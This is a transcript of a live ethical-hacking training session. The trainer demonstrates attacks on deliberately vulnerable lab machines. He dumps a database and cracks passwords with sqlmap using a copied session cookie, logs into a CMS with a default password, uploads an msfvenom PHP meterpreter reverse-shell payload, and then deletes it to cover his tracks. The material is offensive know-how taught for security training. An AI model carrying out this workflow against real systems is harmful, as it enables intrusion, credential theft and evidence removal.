Hello everyone, this is your trainer Akash. I hope you guys are doing great. Today, unfortunately, I won't be able to turn on my cam, so let's just continue without it. There's some sort of misconfiguration. I might have to look into my camera, but that's not going to be a problem in our learning process. Let's just wait 5 more minutes and let everyone join in. I can see people are still coming in. Okay, let us just start the session. I think it's enough time now. So yesterday we have seen a scenario where we were doing SQL injection, and it was taking pretty long time. And today we are going to discuss the results for that SQL injection. Here's my Metasploitable. It's booting up. In the background, it's my Linux. There you go. My Metasploitable is up. And in my Linux, I will be using SQL map to ping the target IP just to confirm we have it available. That means the target is available to respond. And if I go on the browser, I'm able to use DVWA on the same IP address. So this is my target 1.9. I'll go in the SQL injection section and I will click on user ID 1. I'll press enter. There you see. So this was my target yesterday, right? This is the same target that we were using in yesterday's session, but it wasn't working out. I'll tell you the reason why. SQL map is actually very, very picky about what it works with, and we have to provide it the appropriate information to make it work. So when I type sudo SQL map -u colons and the URL. This was my target URL. Next, I will give something which is important to understand, cookies. The job of cookies is to maintain the session. When I have logged in from the client to the server, this authenticated session is valid until unless the cookie is present and the cookie is valid as well. This cookie holds the authentication information. See, it's like whenever let's say me and you are going to meet today, maybe I'm going to meet with Dinesh today, right? And Dinesh and I are going to meet in a public place, maybe in some sort of like a restaurant or something. So the restaurant owner gives us a token number for our meeting, Our meeting will only be valid if we have the token number. If we do not have it, the meeting will be dispersed. It will be end. It will come to an end, right? So the token number here is the cookie. Cookie holds that information. And once your meeting is over, the cookie also gets terminated. Now, for this session that I established on my browser, there is a cookie associated with it. Now, there are two ways of finding cookies. Either you can do it the technical way, that means you can use the inspect element feature. Just make a right click on your browser, click on inspect. It will open this kind of a thing, this kind of box. Let me make it full screen so you can see better. This box is to inspect the web application that's what we are working with. Now, there's an option of console here on the very top. You will see here's console. Console option actually includes the feature to execute certain scripts for testing in the console option. So you can execute different kind of JavaScript here as well, just to confirm if the site is responding or not. This is not a hacking tool. The inspect element is a normal basic developer testing tool. So I can see my cookie here if I do alert document dot cookie. When I type this and I press enter, it will do the alert function and it will show me the document.cookie on my browser like this. You see here? And this is my session ID, which is actually authenticating the whole session that I have established with the server. The session ID is actually very important. Why? Because without the session ID, I'm not even logged in, right? The moment you log into a website, you are given a session ID, okay? And that session ID holds your authentication to your account or to the platform. Without the session ID, you will not be able to interact with the website, obviously. I mean, I cannot come to this page that I was working on without logging in, right? The moment I logged in, that is when it redirected me here. So if I want to interact with any of the services over here, I need the authentication, correct? But in a graphical user interface, I can put a login key and everything. But what about in CLI? How I can log in here? I cannot do the login feature over here. And for that reason, what we can do is we can provide the cookie for the authentication. So I can tell SQL map that I want you to interact with this location, but SQL map have not logged into the session, right? It haven't made the login. So what I'll do, I'll provide my cookie to SQL map by typing ---- cookie. And in this cookie, I'll just provide the session ID that I got from my browser. I'll click copy on PHP session ID. I'm going to copy that and I'm going to paste it in here. So now SQL map will be able to log in with my cookie ID instead of, make an attempt by himself, because this is a CLI tool, right? We don't have a GUI interface to provide the username and password and click submit. So to authenticate the session, I just gave the cookie. So that made it easier for SQL map to authenticate it. Next, I will enumerate database, DBS, and batch to avoid any kind of interruption in my SQL command. This will select all the default options automatically. It will not wait for my interruption. Now I'll press enter and let's see what do we get. Okay. Similar kind of error that we saw yesterday. Oh, actually, we should have given the complete cookie. It's better if we do it that way. Copy. You have to give the complete cookie information and not just like, single entity. So I'll press enter. While the scan is going on, let me show you something else as well. One way of finding the cookie was with this developer console, typing alert document.cookie and everything, right? But there is an easier way as well. You simply download an extension. You go on Google and type here cookie editor. And look into the Firefox add-ons, obviously, because we are using Firefox. So here's a cookie editor available. So let's click enter. Here we have it, cookie editor. You can add this to Firefox and it will be good to go. Click add. Okay. If it asks you permission, then provide all the permissions, no problem. Doesn't matter. Let's get another one. This doesn't seem to work. There can be a lot of cookie editors. It's not just that we only have one of these. I don't know why it's not adding on the Firefox in Kali. Let me try giving it on my Firefox in Windows. Let's see if that works. Firefox, add to Firefox, add it. Okay. Right, so we do have the extension available here, cookie editor. So now if I go on 192.168.1.9/dvwa, I can see here admin password. Now I have an authenticated session here. Okay, I have cookie editor on the top, you can see. So when I click on it, it asks me permission. I provide the permission. There's something wrong with this extension. It is not letting me click on anything, so it's like bullshit. Ignore it, guys. We can do it with the standard way, which is with inspect element. That is the best way. Do not depend on these crappy extensions. Simply type document dot cookie, and we are making an alert. Remember, alert function was to create a pop-up message. And in this pop-up message, I'm going to alert this document.cookie. So when I do this, the website gives me what I wanted, the cookie. And after I executed the command here, along with the proper cookie, and I ask for DBS, if I scroll down at the end of the scan, I have the database here. You can see I have so many databases. One of the databases is DBWA, and that's what we're looking for, right? So if I want to enumerate further, because see, these are the name of the databases, and I want, in a database, there are two major things. There are tables and columns. This is a table, right? In a database, there can be multiple tables, by the way. If this is my database, there are multiple tables in there which store multiple different information, 1, 2, 3, 4. Let's say in table number 3, we have certain number of rows and certain number of columns, right? These are columns and these are rows. So let's say if there is some data in 1, 2, 3, A, B, C, D. So there's something in column 2C, right? In table number 3, I would need to first get the database name, the name of the database. Then I need to get the name of the table. Then I need to get the name of the column, and then I'll go on the row. So it's like a hierarchy. From the database, you find first the table, then you find the column that you're working with, and then you find the row. And after that, you basically get the data to yourself. So this is going to be the hierarchy. And let me show you an example for this also, how it will work. My previous command, I was looking for, oops. Yeah, I was looking for DBS, you see, hyphen DBS. Now that I have got my database, so I'll type capital D and tell that I want to work with DBWA. And next, what I want to enumerate is hyphen tables. So if I got my database name, I can provide it by capital D, and then I can give hyphen tables to enumerate tables. Earlier, I was enumerating databases, so I did hyphen DBS, but now it's tables. So I press enter, and let's wait for it. Okay, it actually got us here. In databases, DBWA, there are only 2 tables, guestbook and users. So if I want, now these are 2 tables, and I want columns present in table users. So how I'm going to give, if you see the pattern, you will get the idea. Hyphen capital T users, hyphen columns. You see what I did? Once I know the table name, I am going to get the columns of the table. I press enter, I get the columns here. You can see in database DBWA table users, there are 6 columns in there, right? And these are 6 column: user, first name, last name, password, user ID. Now, what do you think is the most juiciest information here? Obviously, I have nothing to do with the avatar or even the user ID. I don't care about it. Maybe I do, maybe I do not. So I can enumerate the specific information, or I can enumerate everything at once. I'm going to show you a shortcut how. Simply, now that you know the name of the columns, right? And you know all the users and everything. So what I'll do is I'll type hyphen dump. This hyphen hyphen dump will tell the SQL map that in the table users, I don't care how many columns are there, and I don't care how many rows are there, and I don't care what data is stored in. I want to dump all of it because it will be better if we had all the data at once, right? So we're going to make it that way. So for that, you simply type hyphen hyphen dump. Instead of enumerating one column at a time, I'm going to get all of them at once. This is the best shortcut. Once you get the database name, the table name, just dump everything. So when I press enter now, it will show me everything in a tabular format. See what's happening here is it's pretty interesting to see. Here it got, I think, the usernames, and it's basically enumerating some passwords. Recognize possible password hashes in the column password. Over here, if you can see. What's wrong with my mouse? So SQL map is generous enough for you that if there are encrypted passwords in the database, it will try to decrypt them as well. You see, they're password hashes. So to make it more readable and convenient for you guys, it is also going to crack them for you. And it started already a dictionary-based attack to crack them. It's already doing this background stuff. Okay, it actually did crack the few password hashes you can see here. And in the tabular format, I'm able to see the whole data over here. The user IDs are available, ID 1, 2, 3, and 4, and 5. User names are given here, admin, Gordon, 13, Pablo, Smithy. Avatars are useless. These are the password hashes, and these are the cracked passwords. Charlie, let me in, password, ABC123. And last name is given here, first name is given here. We don't care about that. So let's try logging in with any of these credentials because we just got it, right? We have, let's say, we already have admin and password, the very first one. Let's try with Pablo and let me in. If I go back in my DVWA and I log out, here, let's try Pablo and let me in. See, it worked out. You have logged in as Pablo, right? So this means I have got access to all the users of this website. So basically, I got all the users for this database. Isn't that interesting? And this can be done for any website, by the way. But again, as you can see, it's a highly offensive tool. And that is the reason it should not be used on any of the live targets. So this was a demonstration for SQL map on how SQL databases can be compromised. Now we're going to talk about a specific kind of condition. In the chat box, I've also shared my Drive link. So we did work this on Metasploitable, but our next example is going to be on a different, what do you say, platform, a different simulator. So I'm gonna shut down my Metasploitable, of course, not the Kali. Here is it. I'm gonna shut it down for now. This operating system, this platform is called SickOS. SickOS is another simulator that we have here, which is based on a web server based attack to give you a practice of such kind of web server based attack. By the way, all these simulators are also available on my drive. If you go on the link that I have given in the chat box, this is the link here, drive by terabyte. If I go on it, I will be able to see my drive here. In the lab setup, if you open, I have added some options. Oh, yeah, it's okay, it's loading. Of practice simulators. You can see this one, practice simulators. You can go in there and you can download some of these practice simulators to work with. One of the practice simulator here is SickOS right here. It's in a zip format. Of course, to use it, you have to unzip it, right? So I'll show you how it works. It's very simple. Simply just download this thing, just like I'm doing it. It's pretty simple. See, when you download these things from their official websites, they will be a little bit slower because of the connection with the website and the server response. But in Google Drive, it's easier to, circulate things because Google Drive is faster. You can see it's almost done downloading, right? It's better this way. I've also added some ISOs for those who need it, like Kali, Parrot, Ubuntu, Windows. I've also added some pre-built virtual machines for Kali and Parrot. I'll be adding some more if you need. So in the lab setup, we already have this much. So we have SickOS zip file downloaded here. So to unzip it, it's very simple. Just make a right click and click on extract all. Make a right click on the file, click extract all, and you will get this option to extract it. Let's get this done. I'm going to cancel. It's going to take time, so I'm going to cancel as of now. Let's not just waste time on this because I already have it extracted. So I'm going to show it right away. This is what you will get after the extraction. All these three icons. Once you have these three icons, just make a double click on the center icon, the OVF file, the file that ends with .ovf. When you make a double click on this file, it will automatically add this thing to your VirtualBox. When I make a double click, you see what happens is it opens my VirtualBox. It asks me that if I want to import this virtual appliance. When I click finish, it will be imported. I already have it, so I'm not going to do it again because I already have SICK-OS over here. So I'm just going to give it a start. It's booting up now. Now we will consider that SICK-OS is one of the web servers or one of the remote machines that we have in our network. And I am going to show you how I'm going to hack into it. This will be a scenario that you haven't came across before, but you may came across in a real pen testing scenario. So it's still booting up, I guess. Okay. Once I see this screen, it confirms the SICK-OS is booted. And what do we do on simulators? We leave them aside, right? Because simulators are just to, provide a platform to work with, but not to use them. We will be basically testing them with our Kali, with our Linux, basically. So in my Linux, the first thing I'll do is check the ifconfig. Oh, check the ARP table, sudo ARP scan -- local. I have these many IP addresses already, correct? Now, because I don't know, I've shown you this before, so I'll do the nmap on all the IP range. I'll do this aggressive scanning on all the ranges, so it can show me the in detailed description. So how would you confirm which one is your target? For SICK-OS, I'll show you what will be the identifier. It's still going on. It's 88%. So let's just wait for it. Okay, we are still in the process, I think. It's 90% done. Okay, okay. Let's just give it maybe a minute more. It's taking forever to scan. It's okay. In the meanwhile, you guys can also download the SICK OS and install it in your virtual box. You can get it from my drive link that I've shared in the chat box already. Okay, it's almost done. We can see. Okay, we got the results here finally. The identifier for your SICK OS is pretty straightforward. There's a port on SICK OS that is 3128, which is for a proxy. On whatever machine in your network, you will see 3128. That is going to be SICK OS for you. And if you guys are going to practice that as well, you guys can look for this one. So I'm going to check all my machines that came up with the aggressive scan results. See, aggressive scanning takes time, but it gives me everything in place. For my IP 1.1, it's not there. That's my router. 1.2, not there. On 1.3, nothing here either. 1.4, have FTP, no 3128. 1.6, the same story. We don't have this one. Okay, 1.10 have 3128, if you will see. The proxy squid over here. Now, if you remember, when we were configuring burp suite as well, there was some proxy configuration that we made in Firefox, remember? We added a proxy extension called the Foxy proxy, and through which we were able to connect with the proxy of burp suite so that burp suite can intercept the section, intercept the incoming and outgoing traffic. So to connect with the proxy, we are going to use the same utility, which is Foxy proxy. I have it on the very top. And one of the connection is already there, burp suite, but I will click on options and I'll add a new one to this list. I'll add a new one. Click add. Giving the title, I'm going to type SICK OS. What do we need for a proxy? The first basic requirement is IP address. The next is port number, right? Do we have both of them? Yes, we do. We got the IP address, which is 192.168.1.10. Port number, we already know, 3128, right? So that's a port number for the proxy that we have here. And next, I will save it. If I go in a new tab, and if I look into Foxy proxy, I can see both of them are available, but I'm not connected to either one of them, right? So how do we really start connecting? If I try to connect with 192.168.1.10, and if I open this in the browser, it is currently not connecting. And ultimately, it will say the connection got lost or something like that, problem connecting with the host. Let's just wait for a response. See, it's not going to respond as of now unless I connect with that proxy. And as soon as I do, you will see it will start connecting. It says connection timed out, taking too long to respond, problem loading page. But now, if I connect with SICK OS, you can see it's connected. And if I refresh the page, what does it say? Bleh. It's actually showing me something, right? Basically, that's what's happening here. And if I look into the inspect element, if I look into the page source, it's just a simple web page, right? If you remember, I told you about this thing called robots.txt, right? So robots.txt is the file that is used in websites to hide directories from Google searches. So every time you're looking into a website or in a web server, always look for robots.txt. This is like web application 101. I've already told you all this in reconnaissance sessions. I've already shown you all this with practical examples. I'm going to look for robots.txt on this web server as well. And you can see there are two disallowed directories. One of them is the main one, and the other one is the Wolf CMS. So that means there is a directory named Wolf CMS, which I didn't know about. So let me try opening this Wolf CMS over here. Now I got this kind of like an interface here. It's like a CMS is short for content management system. Okay. Content management system. So what we have here is the basic example of a CMS and how it looks like. If I look into yeah, okay. You can explore the Wolf CMS as much as you want, but you can spend your time here. Again, this is an unknown territory to me. This is somewhere I have never been before, and I'm very limited with options. So the first thing that you can do is look into the admin panel, because that is where you can perform some attacks, like I've shown you on SQL and stuff. So look for admin panel. How should I do that? I don't know about it, right? Because if I do wolf CMS slash admin, it doesn't take me there, right? It says it wasn't found on the server. So what I'll do is I'll simply go on Google and I will type here wolf CMS admin panel location, right? So it's showing for Wolf CMS. I will do I can see the documentation for configuration or something. Right. Let's open the first one. It's by their official website, Wolf CMS. I think. Okay. You might have to do the research, of course. It may take time. It may be, shown pretty early. Sometime you have to dig up the internet a little bit. I'll look into a couple of more links. Okay, it doesn't seem to work. Let's also look into something else. We have some images over here as well. Always look into that because somebody might have uploaded something that can be helpful. Okay, if you see into this image, this person seems to be in the admin panel. That means we can also do that, but we just need to confirm how he got there, right? I'll open this image in a new tab. And if you'll see on the very top, the way he actually logged in was Wolf CMS / a question mark and / an admin. So this might be the way Wolf CMS was created. So let's give it a try here. If I do Wolf CMS question mark / admin, well, what do we have here? It's the basic login portal. What have you learned with the login bypass? We have learned the simple technique 1 equal to 1, right? Let's give it a try. Okay, it doesn't work. Fair enough. The first things you should always do whenever you come across a login portal, it doesn't matter where it is. If you have came across it, try logging in with the default credential. There are multiple instances where we have seen that developers Either they forget or they ignore to remove the default credentials. And if you are able to log in with a default, then I think you don't need to do any further attacks. So if I try any of the default credentials, like maybe admin password, doesn't work. Admin login, admin. See, you can also give a try with the brute forcing mechanism. If you remember, you can create a list of default passwords and brute force with the default password. See which one works out, because there could be hundreds of default passwords that can be available. I'm going to save your time for now, but you can give it a try later. I've shown you multiple brute forcing methods, right? So if I just type here admin, it actually works, right? I am in the admin panel. So my point was, I actually got access to the the website. I was able to bypass the login mechanism. And if you did it, what next? Is that enough? Obviously not, because I just have the access to the website interface, right? I don't have the access to the website server, and I want that. So how I will do it? It's very simple. If you, first of all, always try exploring the whole portal, just take a look into everything, because you don't know what kind of functionality this portal might have. We have pages over here. I can probably delete pages. I can add a new page, or I can maybe copy a page or something. So let's say if I want to remove this second article, if I click delete, let's see if it works. Are you sure you want to delete it? Yes. Okay. Oh, well, it's gone. It confirms that I am the admin, actually. We have users section over here. There's one user, admin@yoursite.com. I can probably modify it. No, I can't. I also cannot add any new users. This is something that I just observed. If I go back into administration, let's see, what do we have here? Okay, I have settings option here. Okay, I can add or remove plugins that are used to create this one. It's almost like WordPress, but WordPress is like 10 times better. Those are almost similar. In the settings, I can also maybe make certain changes. Like I can change the title to something like terabyte. Have hacked you. The site email, I can also even change that, because of course I'm in the admin panel. I can change you are @hacked.com. And I can click save. And as soon as I do that, you will see the site name changes on the top. It says terabyte, I've hacked you over here. You see? So yeah, these kind of defacings the hackers can also do once they get access to your admin. But these are all harmless stuff, It's still not that critical. So if I go on pages, I have here snippets, we have header and the footer, we have layouts, we have files. Oh, we have files. You see that? I can add a new file, I can upload a file, I can delete a file, I can modify it, So this is interesting. This is really interesting. And if you see the permissions for the file that are uploaded, if we have been provided with all the permissions for all the kind of users. Now, mark my words very carefully. On any website whatsoever, if you have the upload functionality, which I have here, you can and you must try the strategy I'm going to tell you right now, okay? Which is very simple, frankly. So If the file upload functionality is available, there are a few questions. Upload functionality available, right? So first thing that comes up is the format. What kind of format we can upload? It may be possible that the website is only allowing certain formats, maybe text files only, maybe PDF files only, maybe PHP files only. So you have to analyze it by a hit and trial method, how much size they're allowing. And based on that, based on all these information, you can create a payload of your own. You have seen in Metasploit, we have a lot of exploits and a lot of payloads. You're right, Mr. Afridi. Thanks for mentioning that in the chat box. Creating a payload is also an option that you have in Metasploit, but we haven't seen that yet. Metasploit have a lot of inbuilt tools and utilities, and one of the functionalities Metasploit have is called MSF Venom. What does it do? Guess. It creates a payload. That's what it do. That's what MSF Venom is used for, to create payloads. And that is what I'm going to do. For web applications, I told you for structure of the application, we use HTML. For the design of the website, we use CSS, right? For to run some scripts, we run JavaScript. But for communication, we use PHP. So we want to communicate with the database, isn't it? We want to send some data from our side and receive some data from the server. So that kind of communication, it can be established with a PHP. So I'm going to make a payload that works with PHP communication. So I'm going to choose a payload with -p, and I'm going to tell Metasploit that the kind of payload I want should be a PHP. It should start a meta predator. If you remember, I told about meta predator before. And it should give me a reverse TCP connection. Now let's understand what I have just written. This all makes sense. Okay, hold on a second. I made a syntactical error. Okay, better. So first thing I mentioned is I want the payload to be working with PHP. Next, I mentioned this term meta predator, right? What is this? This is a type of it's a kind of a shell by Metasploit framework. We have seen the shell before. Remember when we did FTP, right? We have seen a shell, but that shell was command shell. And we had very limited functionality over there. Now consider meta predator as command shell on steroids. You know, meta predator is 10 times better than a command shell, because here you can interact with the system to a very deep level. I mean, you can see the files, you can see the screen, you can upload some stuff. You know, you can literally interact with every single thing. So that's the best thing about meta predator. And along with the meta predator, I am asking the MSF Venom to give me something called as a reverse TCP connection. What's meant by reverse TCP? Simple. If you are the analyst, right? Or let's just consider there's a hacker, right? And his target is this website. If the hacker sends a request on the website that I want to connect with you, will the website ever accept it? Of course, no, because the website never wants a hacker to connect. But what if we can, initiate such a session where the website is made, where the website is manipulated to send me a request? Now, as a hacker, will I accept it? Obviously, yes. But how will we make the website really send us a request? This is going to happen in reverse TCP. Because if you remember, TCP is Transmission Control Protocol, which is used for data connections. If you remember this from the very basic sessions, I don't need to elaborate more. So a simple TCP works like from point A to point B. The TCP packets are going through and getting back, right? But the connection was initiated from point A, right? But in reverse TCP, the connection actually initiates from point B, and I accept it. You see, that's reverse TCP. So basically, we're going to ask the web server to send the connection back to me. But where will it send? How does the web server will know who I am? He needs someone who is waiting for his connection, right? I mean, if you ask your friend to write you a letter, you give him your address, don't you? Otherwise, how will he do that? Even if you ask him to send you a WhatsApp message, you're gonna get him your phone number, or if you want to send him an email, you got to give him your mail address. Similarly, if I want the target to send me a connection request, I need to tell him that, you know what, you can say everything that you want. I am listening to you. So I will be the listener. Okay. As a hacker, I am going to be the listener, and I'll be opening my lhost, which is my IP address. I'm giving you this in the payload so that when the payload executes on the target will know where it is supposed to connect, right? So I'm going to get the IP address for Cali, obviously, because this is where we're going to get the connection back. Let me open a new terminal quickly. ifconfig 1.18. Let me write a notepad and I'll show you here later. 192.168.1.18. Okay. Next, I told you every single communication in your system works on a port number. Without port numbers, you can't do stuff. So I also need to give L port, which is going to be, could be anything random, frankly speaking. I could add a vacant port like 4444. It's never in use. It's always like, vacant. So I can use that. And next, I'm going to save, okay, I'm going to ask it to create a raw payload for me. That means keep it in a default format, keep it nice and simple, don't make it look beautiful. I just want it the way it is. I don't want any kind of adulteration or any kind of modification. Just give me the raw one. And I will generate the payload by pressing enter. So let's see how it's going to work really. If I clear, I'll type sudo msf venom -p php /metadata /reverse TCP. I'm going to give my lhost, which is my IP address, so that the target will know where he is supposed to connect. I also give my port number, and I'm basically letting him know that you got to come to this address, this building number, this apartment, and this room. So this is my address, and this is my port number, so it defines it that way. Next, I'm going to say that please create a raw payload, and when I press enter, you'll see some script kind of thing coming down, which is something that we're going to work with. There you go. You see? So you simply got to copy it from here till the end. From the starting of the PHP opening bracket till here. I'm going to copy this thing and I'm going to save it in a new file. I'm going to create a new file called nano. Let's say I want to create exploit.php, or I'll create payload.php for your better understanding. I pasted all of it in here and I'm going to save it. Control X. Yes. Enter. So now I created this payload.php with the help of MSF Venom. And now I'm going to upload this thing on the target. Actually, I just realized I'm not interacting from my Kali. I'm doing it in my Windows. Oh, it's okay. It's okay. Just quickly, I will share this payload on my Windows. No problem. I've already told you all this before as well. 1.18 on how to create a Python server. It's not something which is new. You have seen this before. I have payload.php available. So I'll click on this. It downloaded the file for me. You can see it's over here. Basic stuff. That's nothing new. I have already shown you all this before. So payload.php is available. I have the upload functionality. But as I told you that when I'll upload it, this file will be executable. And once it is executable, it will start connecting back to my listener, because I've given the L host and L port. L host is the listener port and the listener host. Listener host and listener port. Listener host is attacker's IP. Listener port is attacker's port. Or basically, what is this about? Understand. The attacker is trying to connect with the web server. Web server will never accept his connection request. We already know that. So what will attacker do? He try to upload this payload.php on the web server. Now since it is available, it is also the attacker is also able to execute the payload on the web server. I'll show you how. Now this payload is going to initiate a session on the attacker side. Like it will start from the web server and it will be sent to attacker. But for this, the attacker needs to be in a receiving mode, right? If I throw a ball at you, you should be ready to catch it, right? If you have your hands in the pocket, you cannot catch the ball. So you have to take your hands out. So I have to activate some stuff on the attacker to accept the incoming connection that he's getting from the target. So target already knows where to deliver the request, but it doesn't know that if the attacker is active or not, and he simply don't really care. So what we'll do is we'll start a listener on the attacker. And guess what we're going to use is MSF console. MSF console is, as I said, an all-in-one amazing platform. I'll show you how to do that. Here we have MSF console up and running, MSF 6, you can see there. So I will use a special kind of listener, which is use exploit multi-handler. This multi-handler is a listener for you. He will be listening to all the incoming connections coming from the victims where you have sent your payload. So now when I press enter, it will start using it, right? It is using a generic shell payload. You will see using configured payload this, but this is not the payload that we are using, right? We are using this payload over here, -p, PHP meta predator reverse TCP. So I need to give that. I can also check in show options. You can see the L host is not provided. I need to provide that too. And additionally, the payload option says this is the one that is selected, and that's not the one that I use actually. So I'll start by setting up the payload name, which is PHP meta predator underscore reverse underscore TCP. Next, I gotta set the L host as well because it's not provided. So I gotta give my IP 1.161.18. There you go. Now, if I do show options, now this is more familiar. If you use any other port apart from 4444, you have to provide it here. You have to make it change. If in case I use, let's say 8089, I got to change L port to 8089. But I use the same one, so let's just stick to it. Now, all the details are provided. Now the listener is ready to listen to the incoming connection. And if I type exploit, it will start listening. Now, all I'm doing is waiting for my target to connect with me. So if I go back on the target, which is here, I'll upload a file. It says browse. Okay, I'm going to browse it in my downloads section. I have the payload.php. You can see it. I'll select it and I'll open it. It's here. I will click open. There you go. Invalid CSRF token found. What's wrong with it? Is it logged out? Okay. I don't know. It needed a refresh, maybe. So here we have the payload.php. You can see it clearly. Now, how do you open any file on the web server? How you do that? You simply click on it, don't you? Right? That's what you do to open a web file. You click on it, right? Now, if I take a look, okay, give me a second here. Okay, if you'll see the URL, let's analyze it a little bit. So the URL, admin plugin file manager browse, right? This is where it is. I'm currently in the admin section, but if you analyze the web page a little bit more, you will see here there's another directory named public over here. It says public slash. That means it's a directory. And in this directory, we have this file. To open a file, what do? We go in that directory and then we look for that file, right? So we're going to do the same thing. I'm going to open a new tab. Let me just copy this Wolf CMS thing. Right, here I am. I know that there is a directory here that is for public, just like this one. So I'm going to go in the new tab, Wolf CMS/public. And when I press enter, I can see these files there. You see, I have my file payload.php uploaded just today, 12th October, right? It just got in there. So I'm going to open this side by side for your reference. My listener is active. You know what? This is better. Okay. My listener is active. You can see started the reverse TCP handler. That means it is going to handle all the incoming traffic, whatever I'm going to get. So what I will do, As soon as I click on payload.php, it will start working, and I'll show you how it works. Okay, here is my listener, and that's where my payload is. You will see it happens instantaneously. As soon as I click on it, what do we get here? Sending stage, metadata session 1 open, right? So as soon as the file is executed on the victim side, I get a metadata session open, and I have metadata execution over here, you can see. That means I just literally hacked into the web server. Now, if you want to see what can we do, just ask for help. When I press help, you will see all the commands that are available with Metaprinter. You can do these many commands for core system communication. We have file system commands. We have here networking commands, another system commands. We have audio output commands. We can play some audios, different kind of stuff. So if you see, I can get sysinfo. So that's the first thing I'll do. I'll type sysinfo. Okay, what does it say? It says that this is SICK OS. It's a Linux machine, right? That's what it says. Metaprinter is PHP Linux. Fair enough. If I want the command shell, I can simply type shell and press enter. It will switch me back from Metaprinter to command shell, but I don't want that right now. I can terminate different processes by typing terminal by typing kill. I can execute a different command. I can do various kind of stuff here, by the way. I want to show you something interesting. Give me a second. Here's the machine ID. I can do all these file system commands. So let's just take a look at it. I do ls. I can see the files in there. Payload.php is also there. Now, if I'm a hacker and I have got the access already, I have the access right here. I don't want the developer to ever know that there was a payload, because as soon as the developer starts the forensics, he will see my payload.php there. So the first thing that I will do after getting the access is removing my payload so that they don't know how I got in. So I do rm payload.php, and I'm clear. Now they will not be able to figure out like what exactly gave me the entry. And that is first step you do in covering the tracks, right? That's how it works. So I got the Metaprinter session. That means I have complete access on the system. I can literally delete everything. I can cause a lot of damage to the website. This is exactly how hackers do it. And this is the first thing that we test whenever we have upload functionality on a website. If you are able to upload any file which is malicious, and if you're able to gain a shell access, it needs to be reported immediately, because this is one of the most critical vulnerability a website can have. And trust me, if you report it to the legitimate organization, this have a lot of it have a lot of relevancy, due to which it is one of the highest paid bug. So that's what it is. We just gained a reverse shell. So this was file upload vulnerability on any web server that we just saw. This is how you do it. Tomorrow, we'll look into file upload vulnerability in different systems, how we can gain a reverse shell over a system. I'm going to show you tomorrow how to hack a Windows machine. And we'll also start, because we only have 2 days left, so tomorrow we'll also cover up a little bit of wireless hacking as well. And on the final day, we'll also cover up the cryptography. I'll try to cover both of them because today's day 13th. We only have 2 days left. So let's cover those topics as well so that we have nothing left in our schedule. On the last day, I will also be holding a Q&A with you guys. So I'll be open for any kind of questions. I'll also answer a lot of FAQs. So that's how it's going to be. That was all for today's session. Again, guys, I am sharing the Drive link for those who have missed or failed to save it. I'm sharing it in the chat box. Please save it with yourself. It is going to be an amazing platform for you to learn more because I am adding on a daily basis new stuff. There's a lot more ebooks I've added today, well, yesterday. In the study material, I have added so many more videos for you people to learn and gain access. In the languages, I'll be uploading more. I have, as of now, added Python and I think there's Java, or I don't know, I don't remember. It's Bash. Okay, Bash is the basic programming language that you need to learn if you really want to excel, get an expertise in Linux. You should know Bash, shell scripting. Go for it. So it's free to learn. So why not? So yeah, that's pretty much it for today's session, guys. If anybody have any questions so far for anything, let me know. I'm available. Well, I take that as an understanding that there is no doubt for today. We are done with the session. The attendance link has been shared in your chat boxes already. You guys can fill them up. And I'll see you guys tomorrow, same place, same time. I hope you enjoyed today's session. Tomorrow, we're going to work with some more interesting stuff. Till then, please take care of yourself. Stay safe on the internet. Be responsible. Stay hydrated. And I'll see you guys tomorrow. And back to the ExcelR team. Thank you.
Thank you, Akash. Hope you enjoyed the session, guys. Do you have any queries for me? Please let me know in the chat box. No. Okay. There is no queries for me. That's great. So you are clear about all the things, LMS recordings, materials. Afridi, wait, I have a question. Yes, Afridi, you can ask. Sarojini, I'm sharing again that feedback link. In YouTube, there is no questions. In the link shared by Sir, the pre-built VMs, what's so different with the regular ones?
I would like
Preeti,
to answer that.
yeah,
I
you
like to
can
answer
take.
if you don't mind. So the pre-built VMs are, if you remember the very initial sessions, I explained the difference between an ISO and a pre-built VM. It's like, in ISO is like you're setting up a studio by yourself from the very scratch. You start building your table and your computers and everything. But in a pre-built VM, they are giving you the whole thing set up already. You just need to, just import the whole thing in your VirtualBox and you can start working. You don't have to go through the installation process and all that tiresome work. But with an ISO, you have to literally configure everything from the very scratch. So if you want to save a lot of time and get it done easily, you can go for the pre-built VMs. That's right, Afridi, like the VMX file. Also, I'm sorry, Chandra, I'm going to take it a little bit more time. I just checked my LinkedIn, and there is an internship opportunity for anyone who is interested. This is a pretty good one. It's a remote internship opportunity for 6 months. I'm sharing the link in the chat box for whoever is interested. They can apply for it. It doesn't require you to have a very good expertise, but even if you have like, you know, um, even the base level information, I think you can apply for this. I have shared the link in the chat box with you guys. You can refer me. You can give my reference. I know this. I know Mrs. Gandhi, who is like sharing this internship. So yeah, good luck, and yeah, I'll see you tomorrow. Thanks, Shanna.
Yeah, thank you, Akash. I'm sharing that LinkedIn link in YouTube as well, so you can take from there, YouTube people. So, any other queries? Okay, then there is no more queries. Seems okay. We'll wind up the session for today. Thank you for joining. We'll meet you on the same time, same place tomorrow. Up to then, take care. Bye bye.